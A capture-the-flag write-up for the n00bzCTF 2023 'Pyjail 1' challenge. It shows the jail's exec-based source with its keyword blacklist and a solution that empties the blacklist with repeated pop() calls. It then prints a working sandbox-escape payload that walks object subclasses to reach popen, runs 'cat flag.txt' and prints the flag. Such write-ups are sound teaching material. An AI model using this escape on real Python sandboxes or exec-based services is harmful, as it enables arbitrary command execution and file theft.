Published on

n00bzCTF 2023 – Pyjail 1

Authors
  • avatar
    Name
    Lumy
    Twitter

Pyjail 1

That's a big blacklist for a pyjail challenge, don't you think?

Table of Contents

  1. Source
  2. Solution

Source 

#!/usr/bin/env python3
blacklist = ["/","0","1","2","3","4","5","6","7","8","9","setattr","compile","globals","os","import","_","breakpoint","exit","lambda","eval","exec","read","print","open","'","=",'"',"x","builtins","clear"]
print("="*25)
print(open(__file__).read())
print("="*25)
print("Welcome to the jail!")
print("="*25)

for i in range(2):
	x = input('Enter command: ')
	for c in blacklist:
		if c in x:
			print("Blacklisted word found! Exiting!")
			exit(0)
	exec(x)

Solution

After struggling a bit, I came up with an idea. If we can't use blacklist words, can't we delete the blacklist ?

After reseaching a bit, I came up with this link w3schools.com/python/python_lists_remove.asp

This link shows us the use of the pop function to delete an element from an array. As numbers are prohibited, we can't specify an index but we can juste pop the entire list

blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();blacklist.pop();

The first iteration aims to delete the blacklist. The second payload is used for the actual exploit that is quit easy without restrictions anymore

print(().__class__.__base__.__subclasses__()[137].__init__.__globals__['popen']('cat flag.txt').read())

This results in the flag retrieval

Flag : n00bz{blacklist.pop()_ftw!_7a5d2f8b}